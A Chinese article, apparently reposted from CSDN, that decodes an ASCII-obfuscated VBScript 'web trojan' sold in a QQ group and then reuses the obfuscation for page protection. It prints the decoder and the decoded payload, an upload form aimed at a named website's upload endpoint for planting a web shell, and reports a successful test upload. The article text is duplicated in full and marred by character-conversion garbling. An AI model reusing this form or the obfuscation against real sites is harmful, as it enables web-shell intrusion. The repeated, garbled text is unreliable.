對(duì)某ASC加密網(wǎng)馬的破解和利用
發(fā)布日期:2022-01-03 02:43 | 文章來(lái)源:CSDN
QQ群中,有人在叫賣(mài)網(wǎng)馬。網(wǎng)友花錢(qián)獲得一個(gè)共享給我,讓我看看。于是有了下面的這篇文章。
1.網(wǎng)馬初探
在瀏覽器中打開(kāi)網(wǎng)馬,這個(gè)網(wǎng)馬的功能比較簡(jiǎn)單,主要用來(lái)上傳功能更強(qiáng)的網(wǎng)馬。比較有特色的是可以在目標(biāo)網(wǎng)頁(yè)的上傳漏洞,自己修改修改配置。查看該網(wǎng)馬的源代碼,發(fā)現(xiàn)該網(wǎng)馬加密了,很明顯是用ASC加密。(圖1)
2.網(wǎng)馬分析
雖然該網(wǎng)馬的核心功能代碼進(jìn)行ASC加密了,但其框架一目了然。其代碼及其解釋如下:
<script language=vbscript>
'可以看到該網(wǎng)馬是一個(gè)VB腳本
function rechange(k)
'定義了一個(gè)rechange函數(shù),該函數(shù)定義了一個(gè)變量k
s=Split(k,",")
'split的作用是把k以“,”分開(kāi),把其定義為一個(gè)數(shù)組
t=""
給t賦空值;
For i = 0 To UBound(s)
t=t Chrw(eval(s(i)))
用for進(jìn)行循環(huán)轉(zhuǎn)換,把t值轉(zhuǎn)換為字符,依次累加。UBound是數(shù)組的維數(shù),Chrw是字符轉(zhuǎn)換函數(shù)。
Next
rechange=t
把t返回到函數(shù)
End Function
t="60,33,68,79,67,84,89,80,69,32,104,116,109,108,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,88,72,84,77,76,32,49,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47,......"
'中間省略N多,這就是網(wǎng)馬的功能代碼
document.write rechange(t)
'在瀏覽器中輸出函數(shù)值
</script>
3.網(wǎng)馬解密
可以自行編寫(xiě)一個(gè)ASC解密工具,筆者從網(wǎng)上下載了別人的ASC解密代碼,然后根據(jù)該網(wǎng)馬的加密原理進(jìn)行修改重新編譯生成解密工具。
運(yùn)行該工具,把該網(wǎng)馬源代碼t后面的值拷貝至工具相應(yīng)的文本框中點(diǎn)擊解密,即可還原該網(wǎng)馬的源代碼。(圖2)
<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="STYLE4"> 源(</span><span class="STYLE3">圖片</span><span class="STYLE4">)文件:
</span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
目標(biāo)(</span><span class="STYLE3">大馬</span><span class="STYLE4">)文件:
</span>
<input name="filename1" type=file class=buttonUnActive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上傳大馬 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>
4.解密效果
拷貝解密后的html代碼保存為一test.htm文件,在瀏覽器中打開(kāi),進(jìn)行上傳測(cè)試成功,說(shuō)明對(duì)該網(wǎng)馬的ASC解密成功。(圖3)
5.加密利用
在破解了該網(wǎng)馬的ASC加密之后,我們利用該網(wǎng)馬的加密原理對(duì)我們的網(wǎng)頁(yè)進(jìn)行加密,達(dá)到保護(hù)網(wǎng)頁(yè)代碼的效果。ASC加密主要用來(lái)保護(hù)靜態(tài)頁(yè)面代碼,動(dòng)態(tài)代碼由于在服務(wù)器端,客戶端顯示的只是運(yùn)行結(jié)果?!癐T專家網(wǎng)”的頁(yè)面是動(dòng)態(tài)生成的,作為演示就以它為例進(jìn)行。
查看并拷貝網(wǎng)頁(yè)代碼,通過(guò)“ASCCII速查器”把字符轉(zhuǎn)換成ASC值。然后把生成的ASC值拷貝到我們破解的網(wǎng)馬代碼中作為t的值。這樣可以別人就不能看到網(wǎng)頁(yè)源代碼,看到的只是其的ASC值,對(duì)網(wǎng)頁(yè)代碼起到了一定的保護(hù)作用,運(yùn)行效果和加密前完全一樣。(圖4)
總結(jié):ASC加密是當(dāng)前靜態(tài)網(wǎng)頁(yè)加密的主要形式,從上面筆者對(duì)某網(wǎng)馬的解密看,這種加密形式并不能從根本上保證網(wǎng)頁(yè)代碼的安全。基于筆者及其朋友網(wǎng)站維護(hù)的經(jīng)驗(yàn),推薦幾種網(wǎng)頁(yè)加密方法:
1.腳本加密,通過(guò)類似VB、JAVA這樣腳本代碼實(shí)現(xiàn):封鎖鼠標(biāo)右鍵、禁止查看源文件、鏈接調(diào)用地址加密等功能。
2.IIS的密碼,通過(guò)對(duì)IIS的安全、驗(yàn)證等部署,防止非授權(quán)的訪問(wèn)。
3.ASP程序加密,使用ASP程序來(lái)給網(wǎng)頁(yè)進(jìn)行加密,現(xiàn)在大多數(shù)網(wǎng)站都使用ASP程序,它對(duì)Web服務(wù)器沒(méi)有具體要求,而其加密就是借助數(shù)據(jù)庫(kù)及ASP程序進(jìn)行設(shè)計(jì),來(lái)實(shí)現(xiàn)一種通用網(wǎng)頁(yè)加密。
4.軟件加密,現(xiàn)在給網(wǎng)頁(yè)加密的軟件非常多,其基本原理都是利用javascript代碼,只不過(guò)是這些軟件都自動(dòng)準(zhǔn)備好了這些代碼,只需使用者將網(wǎng)頁(yè)源代碼粘進(jìn)去點(diǎn)擊“加密”按鈕就可以了。
1.網(wǎng)馬初探
在瀏覽器中打開(kāi)網(wǎng)馬,這個(gè)網(wǎng)馬的功能比較簡(jiǎn)單,主要用來(lái)上傳功能更強(qiáng)的網(wǎng)馬。比較有特色的是可以在目標(biāo)網(wǎng)頁(yè)的上傳漏洞,自己修改修改配置。查看該網(wǎng)馬的源代碼,發(fā)現(xiàn)該網(wǎng)馬加密了,很明顯是用ASC加密。(圖1)

2.網(wǎng)馬分析
雖然該網(wǎng)馬的核心功能代碼進(jìn)行ASC加密了,但其框架一目了然。其代碼及其解釋如下:
<script language=vbscript>
'可以看到該網(wǎng)馬是一個(gè)VB腳本
function rechange(k)
'定義了一個(gè)rechange函數(shù),該函數(shù)定義了一個(gè)變量k
s=Split(k,",")
'split的作用是把k以“,”分開(kāi),把其定義為一個(gè)數(shù)組
t=""
給t賦空值;
For i = 0 To UBound(s)
t=t Chrw(eval(s(i)))
用for進(jìn)行循環(huán)轉(zhuǎn)換,把t值轉(zhuǎn)換為字符,依次累加。UBound是數(shù)組的維數(shù),Chrw是字符轉(zhuǎn)換函數(shù)。
Next
rechange=t
把t返回到函數(shù)
End Function
t="60,33,68,79,67,84,89,80,69,32,104,116,109,108,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,88,72,84,77,76,32,49,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47,......"
'中間省略N多,這就是網(wǎng)馬的功能代碼
document.write rechange(t)
'在瀏覽器中輸出函數(shù)值
</script>
3.網(wǎng)馬解密
可以自行編寫(xiě)一個(gè)ASC解密工具,筆者從網(wǎng)上下載了別人的ASC解密代碼,然后根據(jù)該網(wǎng)馬的加密原理進(jìn)行修改重新編譯生成解密工具。
運(yùn)行該工具,把該網(wǎng)馬源代碼t后面的值拷貝至工具相應(yīng)的文本框中點(diǎn)擊解密,即可還原該網(wǎng)馬的源代碼。(圖2)

<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="STYLE4"> 源(</span><span class="STYLE3">圖片</span><span class="STYLE4">)文件:
</span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
目標(biāo)(</span><span class="STYLE3">大馬</span><span class="STYLE4">)文件:
</span>
<input name="filename1" type=file class=buttonUnActive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上傳大馬 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>
4.解密效果
拷貝解密后的html代碼保存為一test.htm文件,在瀏覽器中打開(kāi),進(jìn)行上傳測(cè)試成功,說(shuō)明對(duì)該網(wǎng)馬的ASC解密成功。(圖3)

5.加密利用
在破解了該網(wǎng)馬的ASC加密之后,我們利用該網(wǎng)馬的加密原理對(duì)我們的網(wǎng)頁(yè)進(jìn)行加密,達(dá)到保護(hù)網(wǎng)頁(yè)代碼的效果。ASC加密主要用來(lái)保護(hù)靜態(tài)頁(yè)面代碼,動(dòng)態(tài)代碼由于在服務(wù)器端,客戶端顯示的只是運(yùn)行結(jié)果?!癐T專家網(wǎng)”的頁(yè)面是動(dòng)態(tài)生成的,作為演示就以它為例進(jìn)行。
查看并拷貝網(wǎng)頁(yè)代碼,通過(guò)“ASCCII速查器”把字符轉(zhuǎn)換成ASC值。然后把生成的ASC值拷貝到我們破解的網(wǎng)馬代碼中作為t的值。這樣可以別人就不能看到網(wǎng)頁(yè)源代碼,看到的只是其的ASC值,對(duì)網(wǎng)頁(yè)代碼起到了一定的保護(hù)作用,運(yùn)行效果和加密前完全一樣。(圖4)

總結(jié):ASC加密是當(dāng)前靜態(tài)網(wǎng)頁(yè)加密的主要形式,從上面筆者對(duì)某網(wǎng)馬的解密看,這種加密形式并不能從根本上保證網(wǎng)頁(yè)代碼的安全。基于筆者及其朋友網(wǎng)站維護(hù)的經(jīng)驗(yàn),推薦幾種網(wǎng)頁(yè)加密方法:
1.腳本加密,通過(guò)類似VB、JAVA這樣腳本代碼實(shí)現(xiàn):封鎖鼠標(biāo)右鍵、禁止查看源文件、鏈接調(diào)用地址加密等功能。
2.IIS的密碼,通過(guò)對(duì)IIS的安全、驗(yàn)證等部署,防止非授權(quán)的訪問(wèn)。
3.ASP程序加密,使用ASP程序來(lái)給網(wǎng)頁(yè)進(jìn)行加密,現(xiàn)在大多數(shù)網(wǎng)站都使用ASP程序,它對(duì)Web服務(wù)器沒(méi)有具體要求,而其加密就是借助數(shù)據(jù)庫(kù)及ASP程序進(jìn)行設(shè)計(jì),來(lái)實(shí)現(xiàn)一種通用網(wǎng)頁(yè)加密。
4.軟件加密,現(xiàn)在給網(wǎng)頁(yè)加密的軟件非常多,其基本原理都是利用javascript代碼,只不過(guò)是這些軟件都自動(dòng)準(zhǔn)備好了這些代碼,只需使用者將網(wǎng)頁(yè)源代碼粘進(jìn)去點(diǎn)擊“加密”按鈕就可以了。
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章